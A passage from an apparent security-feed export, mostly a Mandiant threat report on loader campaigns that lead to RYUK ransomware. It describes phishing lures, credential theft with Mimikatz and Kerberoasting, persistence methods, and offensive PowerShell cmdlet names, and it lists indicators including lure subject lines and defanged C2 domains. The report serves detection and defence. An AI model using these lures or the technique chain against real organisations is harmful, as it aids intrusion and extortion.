s3:winbind:idmap_ad: Make failure to get attrnames for schema mode\n fatal; (bso#14425);\n\n This update was imported from the SUSE:SLE-15-SP2:Update update project.\n\n", "edition": 1, "modified": "2020-09-25T15:19:54", "published": "2020-09-25T15:19:54", "id": "OPENSUSE-SU-2020:1526-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2020-09/msg00086.html", "title": "Security update for samba (important)", "type": "suse", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "fireeye": [{"lastseen": "2020-11-23T01:34:16", "bulletinFamily": "info", "cvelist": ["CVE-2020-1472"], "description": "Throughout 2020, ransomware activity has become increasingly prolific, relying on an ecosystem of distinct but co-enabling operations to gain access to targets of interest before conducting extortion. Mandiant Threat Intelligence has tracked several loader and backdoor campaigns that lead to the post-compromise deployment of ransomware, sometimes within [24 hours of initial compromise](<https://thedfirreport.com/2020/10/18/ryuk-in-5-hours/>). Effective and fast detection of these campaigns is key to mitigating this threat.\n\nThe malware families enabling these attacks previously reported by Mandiant to intelligence subscribers include KEGTAP/BEERBOT, SINGLEMALT/STILLBOT and WINEKEY/CORKBOT. While these malware families communicate with the same command and control infrastructure (C2) and are close to functional parity, there are minimal code overlaps across them. Other security researchers have tracked these malware families under the names BazarLoader and [BazarBackdoor](<https://www.vkremez.com/2020/04/lets-learn-trickbot-bazarbackdoor.html>) or [Team9](<https://research.nccgroup.com/2020/06/02/in-depth-analysis-of-the-new-team9-malware-family/>).\n\nThe operators conducting these campaigns have actively targeted hospitals, retirement communities, and medical centers, even in the midst of a global health crisis, demonstrating a clear disregard for human life.\n\n#### Email Campaign TTPs\n\nCampaigns distributing KEGTAP, SINGLEMALT and WINEKEY have been sent to individuals at organizations across a broad range of industries and geographies using a series of shifting delivery tactics, techniques and procedures (TTPs). Despite the frequent changes seen across these campaigns, the following has remained consistent across recent activity:\n\n * Emails contain an in-line link to an actor-controlled Google Docs document, typically a PDF file.\n * This document contains an in-line link to a URL hosting a malware payload.\n * Emails masquerade as generic corporate communications, including follow-ups about documents and phone calls or emails crafted to appear related to complaints, terminations, bonuses, contracts, working schedules, surveys or queries about business hours.\n * Some email communications have included the recipient\u2019s name or employer name in the subject line and/or email body.\n\nDespite this uniformity, the associated TTPs have otherwise changed regularly\u2014both between campaigns and across multiple spam runs seen in the same day. Notable ways that these campaigns have varied over time include:\n\n * Early campaigns were delivered via Sendgrid and included in-line links to Sendgrid URLs that would redirect users to attacker-created Google documents. In contrast, recent campaigns have been delivered via attacker-controlled or compromised email infrastructure and have commonly contained in-line links to attacker-created Google documents, although they have also used links associated with the Constant Contact service.\n * The documents loaded by these in-line links are crafted to appear somewhat relevant to the theme of the email campaign and contain additional links along with instructions directing users to click on them. When clicked, these links download malware binaries with file names masquerading as document files. Across earlier campaigns these malware binaries were hosted on compromised infrastructure, however, the attackers have shifted to hosting their malware on legitimate web services, including Google Drive, Basecamp, Slack, Trello, Yougile, and JetBrains.\n * In recent campaigns, the malware payloads have been hosted on numerous URLs associated with one or more of these legitimate services. In cases where the payloads have been taken down, the actors have sometimes updated their Google documents to contain new, working links.\n * Some campaigns have also incorporated customization, including emails with internal references to the recipients\u2019 organizations (Figure 1) and organizations\u2019 logos embedded into the Google Docs documents (Figure 2).\n\n \nFigure 1: Email containing internal references to target an organization\u2019s name\n\n \nFigure 2: Google Docs PDF document containing a target organization\u2019s logo\n\nHiding the final payload behind multiple links is a simple yet effective way to bypass some email filtering technologies. Various technologies have the ability to follow links in an email to try to identify malware or malicious domains; however, the number of links followed can vary. Additionally, embedding links within a PDF document further makes automated detection and link-following difficult.\n\n#### Post-Compromise TTPs\n\nGiven the possibility that accesses obtained from these campaigns may be provided to various operators to monetize, the latter-stage TTPs, including ransomware family deployed, may vary across intrusions. A notable majority of cases where Mandiant has had visibility into these post-compromise TTPs have been attributable to UNC1878, a financially motivated actor that monetizes network access via the deployment of RYUK ransomware.\n\n_Establish Foothold_\n\nOnce the loader and backdoor have been executed on the initial victim host, the actors have used this initial backdoor to download POWERTRICK and/or Cobalt Strike BEACON payloads to establish a foothold. Notably, the respective loader and backdoor as well as POWERTRICK have typically been installed on a small number of hosts in observed incidents, suggesting these payloads may be reserved for establishing a foothold and performing initial network and host reconnaissance. However, BEACON is frequently found on a larger number of hosts and used throughout various stages of the attack lifecycle.\n\n_Maintain Presence_\n\nBeyond the preliminary phases of each intrusion, we have seen variations in how these attackers have maintained presence after establishing an initial foothold or moving laterally within a network. In addition to the use of common post-exploitation frameworks such as Cobalt Strike, Metasploit and EMPIRE, we have observed the use of other backdoors, including ANCHOR, that we also believe to be under control of the actors behind TrickBot.\n\n * The loaders associated with this activity can maintain persistence through reboot by using at least four different techniques, including creating a scheduled task, adding itself to the startup folder as a shortcut, creating a scheduled Microsoft BITS job using /setnotifycmdline, and adding itself to the Userinit value under the following registry key:\n * HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon.\n * Actors have downloaded POWERTRICK, Metasploit Meterpreter, and Cobalt Strike BEACON payloads following the initial compromise. BEACON payloads have commonly been executed after moving laterally to new hosts within the victim network. The attackers have employed Cobalt Strike payloads crafted to maintain persistence through reboot via a scheduled task on critical systems in victim environments. Notably, BEACON is the backdoor observed most frequently across these incidents.\n * We have observed actors executing encoded PowerShell commands that ultimately executed instances of the PowerShell EMPIRE backdoor.\n * The actors were observed using BEACON to execute [PowerLurk's](<https://github.com/Sw4mpf0x/PowerLurk>) Register-MaliciousWmiEvent cmdlet to register WMI events used to kill processes related to security tools and utilities, including Task Manager, WireShark, TCPView, ProcDump, Process Explorer, Process Monitor, NetStat, PSLoggedOn, LogonSessions, Process Hacker, Autoruns, AutorunsSC, RegEdit, and RegShot.\n * In at least once case, attackers have maintained access to a victim environment using stolen credentials to access corporate VPN infrastructure configured to require only single-factor authentication.\n\n_Escalate Privileges_\n\nThe most commonly observed methods for escalating privileges in these incidents have involved the use of valid credentials. The actors used a variety of techniques for accessing credentials stored in memory or on disk to access privileged accounts. \n\n * The actors used valid credentials obtained using MimiKatz variants to escalate privileges. We\u2019ve observed Mimikatz being executed both from the file system of victim hosts and via PowerShell cmdlets executed via Cobalt Strike BEACON.\n * Actors have gained access to credentials via exported copies of the _ntds.dit_ Active Directory database and SYSTEM and SECURITY registry hives from a Domain Controller. \n * In multiple instances, the actors have launched attacks against Kerberos, including the use of RUBEUS, the MimiKatz Kerberos module, and the Invoke-Kerberoast cmdlet.\n\n_Reconnaissance_\n\nThe approaches taken to perform host and network reconnaissance across these incidents varied; however, a significant portion of observed reconnaissance activity has revolved around Activity Directory enumeration using publicly available utilities such as BLOODHOUND, SHARPHOUND or ADFind, as well as the execution of PowerShell cmdlets using Cobalt Strike BEACON.\n\n * BEACON has been installed on a large number of systems across these intrusions and has been used to execute various reconnaissance commands including both built-in host commands and PowerShell cmdlets. Observed PowerShell cmdlets include:\n * Get-GPPPassword\n * Invoke-AllChecks\n * Invoke-BloodHound\n * Invoke-EternalBlue\n * Invoke-FileFinder\n * Invoke-HostRecon\n * Invoke-Inveigh\n * Invoke-Kerberoast\n * Invoke-LoginPrompt\n * Invoke-mimikittenz\n * Invoke-ShareFinder\n * Invoke-UserHunter\n * Mandiant has observed actors using POWERTRICK to execute built-in system commands on the initial victim host, including _ipconfig_, _findstr_, and _cmd.exe._\n * The actors leveraged publicly available utilities Adfind, BLOODHOUND, SHARPHOUND, and KERBRUTE on victim networks to collect Active Directory information and credentials.\n * WMIC commands have been used to perform host reconnaissance, including listing installed software, listing running processes, and identifying operating system and system architecture.\n * The actors have used a batch script to ping all servers identified during Active Directory enumeration and output the results to _res.txt_. \n * The actors used the _Nltest _command to list domain controllers.\n\n_Lateral Movement_\n\nLateral movement was most commonly accomplished using valid credentials in combination with Cobalt Strike BEACON, RDP and SMB, or using the same backdoors used to establish a foothold in victim networks.\n\n * The actors have regularly leveraged Cobalt Strike BEACON and Metasploit Meterpreter to move laterally within victim environments. \n * The actors commonly moved laterally within victim environments using compromised accounts\u2014both those belonging to regular users and accounts with administrative privileges. In addition to the use of common post-exploitation frameworks, lateral movement has also been achieved using WMIC commands and the Windows RDP and SMB protocols. \n * The actors used the Windows _net use_ command to connect to Windows admin shares to move laterally.\n\n_Complete Mission_\n\nMandiant is directly aware of incidents involving KEGTAP that included the post-compromise deployment of RYUK ransomware. We have also observed instances where ANCHOR infections, another backdoor associated with the same actors, preceded CONTI or MAZE deployment.\n\n * In at least one case, an executable was observed that was designed to exfiltrate files via SFTP to an attacker-controlled server.\n * The actors have used Cobalt Strike BEACON to exfiltrate data created through network reconnaissance activities as well as user files.\n * The actors were observed deleting their tools from victim hosts in an attempt to remove indicators of compromise.\n * The actors have used their access to the victim network to deploy ransomware payloads. There is evidence to suggest that RYUK ransomware was likely deployed via PsExec, but other scripts or artifacts related to the distribution process were not available for forensic analysis.\n\n#### Hunting Strategies\n\nIf an organization identifies a host with an active infection believed to be an instance of KEGTAP or a parallel malware family, the following containment actions are recommended. Note that due to the velocity of this intrusion activity, these actions should be taken in parallel.\n\n * Isolate and perform a forensic review of any impacted systems.\n * Review incoming emails to the user that owns the impacted device for emails matching the distribution campaigns, and take action to remove the messages from all mailboxes.\n * Identify the URLs used by the phishing campaign and block them using proxy or network security devices.\n * Reset credentials for any user accounts associated with execution of the malware.\n * Perform an enterprise wide review for lateral movement authentication from the impacted systems.\n * Check authentication logs from any single-factor remote access solutions that may exist (VPN, VDI, etc) and move towards multi-factor authentication (MFA) as soon as possible.\n\nAn enterprise-wide effort should be made to identify host-based artifacts related to the execution of first-stage malware and all post-intrusion activity associated with this activity. Some baseline approaches to this have been captured as follows.\n\nActivity associated with the KEGTAP loader can often be identified via a review of system startup folders and Userinit values under the HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon registry key.\n\n%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\adobe.lnk \n \n--- \n \nFigure 3: Example LNK file associated with KEGTAP persistence within a system\u2019s startup folders****\n\nSINGLEMALT employs BITS to maintain persistence through reboot and can often be identified via a review of anomalous BITS jobs. SINGLEMALT uses a well-documented BITS persistence mechanism that intentionally creates a job to download a non-existent URL, which will trigger a failure event. The job is set to retry on a regular interval, thus ensuring the malware continues to run. To review the BITS job on a host run the command bitsadmin /list.\n\n * Display name may be \u201cAdobe Update\u201d, \u201cSystem autoupdate\u201d or another generic value.\n * Notify state may be set to Fail (Status 2).\n * FileList URL value may be set to the local host or a URL that does not exist.\n * The Notification Command Line value may contain the path to the SINGLEMALT sample and/or a command to move it to a new location then start it.\n * The Retry Delay value will be set.\n\nWINEKEY maintains persistence through reboot via the use of registry RUN keys. Searching for anomalous RUN keys enterprise-wide can help to identify systems impacted by this malware.\n\nKey: HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Backup Mgr\n\nValue: Path to the backdoor \n \n--- \n \nFigure 4: Example registry RUN key used by WINEKEY to maintain persistence\n\nThe ANCHOR backdoor has been seen across a subset of intrusions associated with this activity and can often be identified via the scheduled tasks it uses to maintain persistence through reboot. The scheduled tasks created by ANCHOR are often unnamed, although that is not always the case.\n\n * The identification of named scheduled tasks associated with ANCHOR persistence may be constructed according to the following pattern: &lt;_Random directory within %APPDATA%_&gt; autoupdate#&lt;_random number_&gt;.\n * All unnamed scheduled tasks should be reviewed, particularly those with a creation date consistent with the time of the suspected compromise.\n\nAlthough it is a low fidelity indicator, ANCHOR activity may also sometimes be identified by searching for binaries within the C:\\Windows\\SysWOW64 directory that have a file name matching the following pattern: &lt;_8 random lowercase chars_&gt;.exe. Stacking or sorting on file creation timestamps in the C:\\Windows\\SysWOW64 directory may also help identify malicious files, as the directory should be mostly static.\n\nPost-exploitation activity associated with the deployment of ransomware following these campaigns is typically conducted using the Cobalt Strike attack framework. The BEACON payload associated with Cobalt Strike can often be identified via a review of existing registered services and service creation events (Event ID 7045), both markers of the mechanism it most commonly employs to maintain persistence.\n\nThe following are additional strategies that may aid in identifying associated activity:\n\n * Organizations can review web proxy logs in order to identify HXXP requests for file storage, project management, collaboration or communication services with a referrer from a Google Docs document.\n * During the associated post-compromise activity, attackers have commonly staged their tools and data in the PerfLogs directory and C$ share.\n * While collecting data used to enable later-stage operations, the attackers commonly leave instances of ntds.dit and exports of the SYSTEM and SECURITY registry hives on impacted systems.\n\n#### Hardening Strategies\n\nThe actions taken by the actors to escalate privileges and move laterally in an environment use well-documented techniques that search the network and Active Directory for common misconfigurations that expose credentials and systems for abuse. Organizations can take steps to limit the impact and effectiveness of these techniques. For more in-depth recommendations see our [ransomware protection white paper](<https://www.fireeye.com/content/dam/fireeye-www/current-threats/pdfs/wp-ransomware-protection-and-containment-strategies.pdf>).\n\n * Harden service accounts against brute force and password guessing attacks. Most organizations have at least a few service accounts with passwords set to never expire. These passwords are likely old and insecure. Make a best effort to reset as many of these accounts as possible to long and complex passwords. In cases where it is possible, migrate to MSAs and gMSAS for automated rotation.\n * Prevent the usage of privileged accounts for lateral movement. Use GPOs to restrict the ability for privileged accounts such as Domain Administrators and privileged service accounts from initiating RDP connections and network logins.Actors often pick just a few accounts to use for RDP; by limiting the number of potential accounts, you provide detection opportunities and opportunities to slow the actor.\n * Block internet access for servers where possible. Often times there is no business need for servers, especially AD infrastructure systems, to access the Internet. The actors often choose high-uptime servers for the deployment of post-exploitation tools such as BEACON.\n * Block uncategorized and newly registered domains using web proxies or DNS filters. Often the final payload delivered via phishing is hosted on a compromised third-party website that do not have a business categorization.\n * Ensure that critical patches are installed on Windows systems as well as network infrastructure. We have observed attackers exploiting well-known vulnerabilities such as Zerologon (CVE-2020-1472) to escalate privileges in an environment prior to deploying ransomware. In other cases, possibly unrelated to UNC1878, we have observed threat actors gain access to an environment through vulnerable VPN infrastructure before deploying ransomware.\n\nFor more intelligence on ransomware and other threats, please register for [Mandiant Advantage Free](<https://www.fireeye.com/mandiant/advantage.html>), a no-cost version of our threat intelligence platform. Check out this episode of _[State of the Hack](<https://www.youtube.com/watch?v=X8r-M-TjT3k>)_ for additional information on this threat.\n\n#### Campaign Indicators\n\n_Sample Email Subjects / Patterns_\n\n * &lt;(first|last)-name&gt;: Important Information\n * &lt;Company Name&gt;\n * &lt;Company Name&gt; complaint\n * &lt;(first|last)-name&gt;\n * &lt;(first|last)-name&gt;\n * Agreement cancellation message\n * Agreement cancellation notice\n * Agreement cancellation notification\n * Agreement cancellation reminder\n * Agreement suspension message\n * Agreement suspension notice\n * Agreement suspension notification\n * Agreement suspension reminder\n * Arrangement cancellation message\n * Arrangement cancellation notice\n * Arrangement cancellation notification\n * Arrangement cancellation reminder\n * Arrangement suspension message\n * Arrangement suspension notice\n * Arrangement suspension notification\n * Arrangement suspension reminder\n * Contract cancellation message\n * Contract cancellation notice\n * Contract cancellation notification\n * Contract cancellation reminder\n * Contract suspension message\n * Contract suspension notice\n * Contract suspension notification\n * Contract suspension reminder\n * debit confirmation\n * FW: &lt;Name&gt; Annual Bonus Report is Ready\n * FW: Urgent: &lt;Company Name&gt;: A Customer Complaint Request \u2013 Prompt Action Required\n * RE: &lt;(first|last)-name&gt;\n * RE: &lt;(first|last)-name&gt;: Your Payslip for October\n * RE: &lt;Company Name&gt; \\- my visit\n * RE: &lt;Company Name&gt; Employee Survey\n * RE: &lt;Company Name&gt; office\n * RE: &lt;Name&gt; about complaint\n * RE: &lt;Name&gt; bonus\n * RE: &lt;Name&gt; termination list\n * RE: &lt;Name&gt;\n * RE: &lt;Company Name&gt; office\n * RE: &lt;(first|last)-name&gt;\n * RE: &lt;(first|last)-name&gt; &lt;(first|last)-name&gt;: complaint\n * RE: &lt;(first|last)-name&gt;: Subpoena\n * RE: &lt;(first|last)-name&gt;\n * RE: &lt;(first|last)-name&gt;: Your Payslip for September\n * RE: about complaint\n * RE: Adopted Filer Forms\n * RE: Business hours adjustment\n * RE: Business hours realignment\n * RE: Business hours rearrangement\n * RE: Business hours restructuring\n * RE: Business schedule adjustment\n * RE: Business schedule realignment\n * RE: Business schedule rearrangement\n * RE: Business schedule restructuring\n * RE: call me\n * RE: changes\n * RE: complaint\n * RE: Complaint in &lt;Company Name&gt;.\n * RE: Complaint on &lt;Name&gt;\n * RE: customer request\n * RE: debit confirmation\n * RE: document copy\n * RE: documents list\n * RE: Edgar Filer forms renovations\n * RE: employee bonuses\n * RE: Filer Forms adaptations\n * RE: my call\n * RE: New filer form types\n * RE: office\n * RE: our meeting\n * RE: Payroll Register\n * RE: report confirmation\n * RE: situation\n * RE: Subpoena\n * RE: termination\n * RE: till 2 pm\n * RE: Urgent &lt;Company Name&gt; Employee Internal Survey\n * RE: visit\n * RE: what about your opinion?\n * RE: what time?\n * RE: why\n * RE: why this debit\n * RE: Working schedule adjustment\n * RE: Working schedule realignment\n * RE: Working schedule rearrangement\n * RE: Working schedule restructuring\n * RE: Your Payslip for September\n\n_Example Malware Family MD5s_\n\n * KEGTAP\n * df00d1192451268c31c1f8568d1ff472\n * BEERBOT\n * 6c6a2bfa5846fab374b2b97e65095ec9\n * SINGLEMALT\n * 37aa5690094cb6d638d0f13851be4246\n * STILLBOT\n * 3176c4a2755ae00f4fffe079608c7b25\n * WINEKEY\n * 9301564bdd572b0773f105287d8837c4\n * CORKBOT\n * 0796f1c1ea0a142fc1eb7109a44c86cb\n\n_Code Signing Certificate CNs_\n\n * ARTBUD RADOM SP Z O O\n * BESPOKE SOFTWARE SOLUTIONS LIMITED\n * Best Fud, OOO\n * BlueMarble GmbH\n * CHOO FSP, LLC\n * Company Megacom SP Z O O\n * ESTELLA, OOO\n * EXON RENTAL SP Z O O\n * Geksan LLC\n * GLOBAL PARK HORIZON SP Z O O\n * Infinite Programming Limited\n * James LTH d.o.o.\n * Logika OOO\n * MADAS d.o.o.\n * MUSTER PLUS SP Z O O\n * NEEDCODE SP Z O O\n * Nordkod LLC\n * NOSOV SP Z O O\n * OOO MEP\n * PLAN CORP PTY LTD\n * REGION TOURISM LLC\n * RESURS-RM OOO\n * Retalit LLC\n * Rumikon LLC\n * SNAB-RESURS, OOO\n * TARAT d.o.o.\n * TES LOGISTIKA d.o.o.\n * VAS CO PTY LTD\n * VB CORPORATE PTY. LTD.\n * VITA-DE d.o.o.\n\n#### UNC1878 Indicators\n\nA significant proportion of the post-compromise activity associated with these campaigns has involved the distribution of RYUK ransomware by a threat group tracked by Mandiant as UNC1878. As such, we are releasing indicators associated with this group.\n\n_BEACON C2s_\n\n**First Seen**\n\n| \n\n**Domain** \n \n---|--- \n \n12/11/19\n\n| \n\nupdatemanagir[.]us \n \n12/20/19\n\n| \n\ncmdupdatewin[.]com \n \n12/26/19\n\n| \n\nscrservallinst[.]info \n \n1/10/20\n\n| \n\nwinsystemupdate[.]com \n \n1/11/20\n\n| \n\njomamba[.]best \n \n1/13/20\n\n| \n\nupdatewinlsass[.]com \n \n1/16/20\n\n| \n\nwinsysteminfo[.]com \n \n1/20/20\n\n| \n\nlivecheckpointsrs[.]com \n \n1/21/20\n\n| \n\nciscocheckapi[.]com \n \n1/28/20\n\n| \n\ntimesshifts[.]com \n \n1/29/20\n\n| \n\ncylenceprotect[.]com \n \n1/30/20\n\n| \n\nsophosdefence[.]com \n \n1/30/20\n\n| \n\ntaskshedulewin[.]com \n \n1/30/20\n\n| \n\nwindefenceinfo[.]com \n \n1/30/20\n\n| \n\nlsasswininfo[.]com \n \n1/30/20\n\n| \n\nupdate-wind[.]com \n \n1/30/20\n\n| \n\nlsassupdate[.]com \n \n1/30/20\n\n| \n\nrenovatesystem[.]com \n \n1/31/20\n\n| \n\nupdatewinsoftr[.]com \n \n2/2/20\n\n| \n\ncleardefencewin[.]com \n \n2/2/20\n\n| \n\ncheckwinupdate[.]com \n \n2/2/20\n\n| \n\nhavesetup[.]net \n \n2/3/20\n\n| \n\nupdate-wins[.]com \n \n2/3/20\n\n| \n\nconhostservice[.]com \n \n2/4/20\n\n| \n\nmicrosoftupdateswin[.]com \n \n2/4/20\n\n| \n\niexploreservice[.]com \n \n2/12/20\n\n| \n\navrenew[.]com \n \n2/12/20\n\n| \n\ntarget-support[.]online \n \n2/12/20\n\n| \n\nweb-analysis[.]live \n \n2/14/20\n\n| \n\nfreeallsafe[.]com \n \n2/17/20\n\n| \n\nwindefens[.]com \n \n2/17/20\n\n| \n\ndefenswin[.]com \n \n2/17/20\n\n| \n\neasytus[.]com \n \n2/17/20\n\n| \n\ngreattus[.]com \n \n2/17/20\n\n| \n\nlivetus[.]com \n \n2/17/20\n\n| \n\ncomssite[.]com \n \n2/17/20\n\n| \n\nfindtus[.]com \n \n2/17/20\n\n| \n\nbigtus[.]com \n \n2/17/20\n\n| \n\naaatus[.]com \n \n2/17/20\n\n| \n\nbesttus[.]com \n \n2/17/20\n\n| \n\nfirsttus[.]com \n \n2/17/20\n\n| \n\nworldtus[.]com \n \n2/26/20\n\n| \n\nfreeoldsafe[.]com \n \n2/26/20\n\n| \n\nserviceupdates[.]net \n \n2/26/20\n\n| \n\ntopserviceupdater[.]com \n \n2/27/20\n\n| \n\nmyserviceupdater[.]com \n \n2/29/20\n\n| \n\nmyservicebooster[.]net \n \n2/29/20\n\n| \n\nservicesbooster[.]org \n \n2/29/20\n\n| \n\nbrainschampions[.]com \n \n2/29/20\n\n| \n\nmyservicebooster[.]com \n \n2/29/20\n\n| \n\ntopservicesbooster[.]com \n \n2/29/20\n\n| \n\nservicesbooster[.]com \n \n2/29/20\n\n| \n\ntopservicesecurity[.]org \n \n2/29/20\n\n| \n\ntopservicesecurity[.]net \n \n2/29/20\n\n| \n\ntopsecurityservice[.]net \n \n2/29/20\n\n| \n\nmyyserviceupdater[.]com \n \n2/29/20\n\n| \n\ntopservicesupdate[.]com \n \n2/29/20\n\n| \n\ntopservicesecurity[.]com \n \n2/29/20\n\n| \n\nservicesecurity[.]org \n \n2/29/20\n\n| \n\nmyserviceconnect[.]net \n \n3/2/20\n\n| \n\ntopservicesupdates[.]com \n \n3/2/20\n\n| \n\nyoursuperservice[.]com \n \n3/2/20\n\n| \n\ntopservicehelper[.]com \n \n3/2/20\n\n| \n\nserviceuphelper[.]com \n \n3/2/20\n\n| \n\nserviceshelpers[.]com \n \n3/2/20\n\n| \n\nboostsecuritys[.]com \n \n3/3/20\n\n| \n\nhakunamatatata[.]com \n \n3/8/20\n\n| \n\nservice-updater[.]com \n \n3/9/20\n\n| \n\nsecondserviceupdater[.]com \n \n3/9/20\n\n| \n\ntwelvethserviceupdater[.]com \n \n3/9/20\n\n| \n\ntwentiethservicehelper[.]com \n \n3/9/20\n\n| \n\ntwelfthservicehelper[.]com \n \n3/9/20\n\n| \n\ntenthservicehelper[.]com \n \n3/9/20\n\n| \n\nthirdserviceupdater[.]com \n \n3/9/20\n\n| \n\nthirdservicehelper[.]com \n \n3/9/20\n\n| \n\ntenthserviceupdater[.]com \n \n3/9/20\n\n| \n\nthirteenthservicehelper[.]com \n \n3/9/20\n\n| \n\nseventeenthservicehelper[.]com \n \n3/9/20\n\n| \n\nsixteenthservicehelper[.]com \n \n3/9/20\n\n| \n\nsixthservicehelper[.]com \n \n3/9/20\n\n| \n\nseventhservicehelper[.]com \n \n3/9/20\n\n| \n\nseventhserviceupdater[.]com \n \n3/9/20\n\n| \n\nsixthserviceupdater[.]com \n \n3/9/20\n\n| \n\nsecondservicehelper[.]com \n \n3/9/20\n\n| \n\nninthservicehelper[.]com \n \n3/9/20\n\n| \n\nninethserviceupdater[.]com \n \n3/9/20\n\n| \n\nfourteenthservicehelper[.]com \n \n3/9/20\n\n| \n\nfourthserviceupdater[.]com \n \n3/9/20\n\n| \n\nfirstserviceupdater[.]com \n \n3/9/20\n\n| \n\nfirstservisehelper[.]com \n \n3/9/20\n\n| \n\nfifthserviceupdater[.]com \n \n3/9/20\n\n| \n\neleventhserviceupdater[.]com \n \n3/9/20\n\n| \n\nfifthservicehelper[.]com \n \n3/9/20\n\n| \n\nfourservicehelper[.]com \n \n3/9/20\n\n| \n\neighthservicehelper[.]com \n \n3/9/20\n\n| \n\neighteenthservicehelper[.]com \n \n3/9/20\n\n| \n\neighthserviceupdater[.]com \n \n3/9/20\n\n| \n\nfifteenthservicehelper[.]com \n \n3/9/20\n\n| \n\nnineteenthservicehelper[.]com \n \n3/9/20\n\n| \n\neleventhservicehelper[.]com \n \n3/14/20\n\n| \n\nthirdservice-developer[.]com \n \n3/14/20\n\n| \n\nfifthservice-developer[.]com \n \n3/15/20\n\n| \n\nfirstservice-developer[.]com \n \n3/16/20\n\n| \n\nfourthservice-developer[.]com \n \n3/16/20\n\n| \n\nninethservice-developer[.]com \n \n3/16/20\n\n| \n\nseventhservice-developer[.]com \n \n3/16/20\n\n| \n\nsecondservice-developer[.]com \n \n3/16/20\n\n| \n\nsixthservice-developer[.]com \n \n3/16/20\n\n| \n\ntenthservice-developer[.]com \n \n3/16/20\n\n| \n\neithtservice-developer[.]com \n \n3/17/20\n\n| \n\nservicedupdater[.]com \n \n3/17/20\n\n| \n\nservice-updateer[.]com \n \n3/19/20\n\n| \n\nsexyservicee[.]com \n \n3/19/20\n\n| \n\nserviceboostnumberone[.]com \n \n3/19/20\n\n| \n\nservicedbooster[.]com \n \n3/19/20\n\n| \n\nservice-hunter[.]com \n \n3/19/20\n\n| \n\nservicedhunter[.]com \n \n3/19/20\n\n| \n\nservicedpower[.]com \n \n3/19/20\n\n| \n\nsexycservice[.]com \n \n3/23/20\n\n| \n\nyourserviceupdater[.]com \n \n3/23/20\n\n| \n\ntop-serviceupdater[.]com \n \n3/23/20\n\n| \n\ntop-servicebooster[.]com \n \n3/23/20\n\n| \n\nserviceshelps[.]com \n \n3/23/20\n\n| \n\nservicemonsterr[.]com \n \n3/23/20\n\n| \n\nservicehunterr[.]com \n \n3/23/20\n\n| \n\nservice-helpes[.]com \n \n3/23/20\n\n| \n\nservicecheckerr[.]com \n \n3/23/20\n\n| \n\nnewservicehelper[.]com \n \n3/23/20\n\n| \n\nhuntersservice[.]com \n \n3/23/20\n\n| \n\nhelpforyourservice[.]com \n \n3/23/20\n\n| \n\nboostyourservice[.]com \n \n3/26/20\n\n| \n\ndevelopmasters[.]com \n \n3/26/20\n\n| \n\nactionshunter[.]com \n \n5/4/20\n\n| \n\ninfo-develop[.]com \n \n5/4/20\n\n| \n\nayechecker[.]com \n \n5/4/20\n\n| \n\nservice-booster[.]com \n \n9/18/20\n\n| \n\nzapored[.]com \n \n9/22/20\n\n| \n\ngtrsqer[.]com \n \n9/22/20\n\n| \n\nchalengges[.]com \n \n9/22/20\n\n| \n\ncaonimas[.]com \n \n9/22/20\n\n| \n\nhakunaman[.]com \n \n9/22/20\n\n| \n\ngetinformationss[.]com \n \n9/22/20\n\n| \n\nnomadfunclub[.]com \n \n9/22/20\n\n| \n\nharddagger[.]com \n \n9/22/20\n\n| \n\nerrvghu[.]com \n \n9/22/20\n\n| \n\nreginds[.]com \n \n9/22/20\n\n| \n\ngameleaderr[.]com \n \n9/22/20\n\n| \n\nrazorses[.]com \n \n9/22/20\n\n| \n\nvnuret[.]com \n \n9/22/20\n\n| \n\nregbed[.]com \n \n9/22/20\n\n| \n\nbouths[.]com \n \n9/23/20\n\n| \n\nayiyas[.]com \n \n9/23/20\n\n| \n\nserviceswork[.]net \n \n9/23/20\n\n| \n\nmoonshardd[.]com \n \n9/23/20\n\n| \n\nhurrypotter[.]com \n \n9/23/20\n\n| \n\nbiliyilish[.]com \n \n9/23/20\n\n| \n\nblackhoall[.]com \n \n9/23/20\n\n| \n\ncheckhunterr[.]com \n \n9/23/20\n\n| \n\ndaggerclip[.]com \n \n9/23/20\n\n| \n\ncheck4list[.]com \n \n9/24/20\n\n| \n\nchainnss[.]com \n \n9/29/20\n\n| \n\nhungrrybaby[.]com \n \n9/30/20\n\n| \n\nmartahzz[.]com \n \n10/1/20\n\n| \n\njonsonsbabyy[.]com \n \n10/1/20\n\n| \n\nwondergodst[.]com \n \n10/1/20\n\n| \n\nzetrexx[.]com \n \n10/1/20\n\n| \n\ntiancaii[.]com \n \n10/1/20\n\n| \n\ncantliee[.]com \n \n10/1/20\n\n| \n\nrealgamess[.]com \n \n10/1/20\n\n| \n\nmaybebaybe[.]com \n \n10/1/20\n\n| \n\nsaynoforbubble[.]com \n \n10/1/20\n\n| \n\nchekingking[.]com \n \n10/1/20\n\n| \n\nrapirasa[.]com \n \n10/1/20\n\n| \n\nraidbossa[.]com \n \n10/1/20\n\n| \n\nmountasd[.]com \n \n10/1/20\n\n| \n\npuckhunterrr[.]com \n \n10/1/20\n\n| \n\npudgeee[.]com \n \n10/1/20\n\n| \n\nloockfinderrs[.]com \n \n10/1/20\n\n| \n\nlindasak[.]com \n \n10/1/20\n\n| \n\nbithunterr[.]com \n \n10/1/20\n\n| \n\nvoiddas[.]com \n \n10/1/20\n\n| \n\nsibalsakie[.]com \n \n10/1/20\n\n| \n\ngiveasees[.]com \n \n10/1/20\n\n| \n\nshabihere[.]com \n \n10/1/20\n\n| \n\ntarhungangster[.]com \n \n10/1/20\n\n| \n\nimagodd[.]com \n \n10/1/20\n\n| \n\nraaidboss[.]com \n \n10/1/20\n\n| \n\nsunofgodd[.]com \n \n10/1/20\n\n| \n\nrulemonster[.]com \n \n10/1/20\n\n| \n\nloxliver[.]com \n \n10/1/20\n\n| \n\nservicegungster[.]com \n \n10/1/20\n\n| \n\nkungfupandasa[.]com \n \n10/2/20\n\n| \n\ncheck1domains[.]com \n \n10/5/20\n\n| \n\nsweetmonsterr[.]com \n \n10/5/20\n\n| \n\nqascker[.]com \n \n10/7/20\n\n| \n\nremotessa[.]com \n \n10/7/20\n\n| \n\ncheapshhot[.]com \n \n10/7/20\n\n| \n\nhavemosts[.]com \n \n10/7/20\n\n| 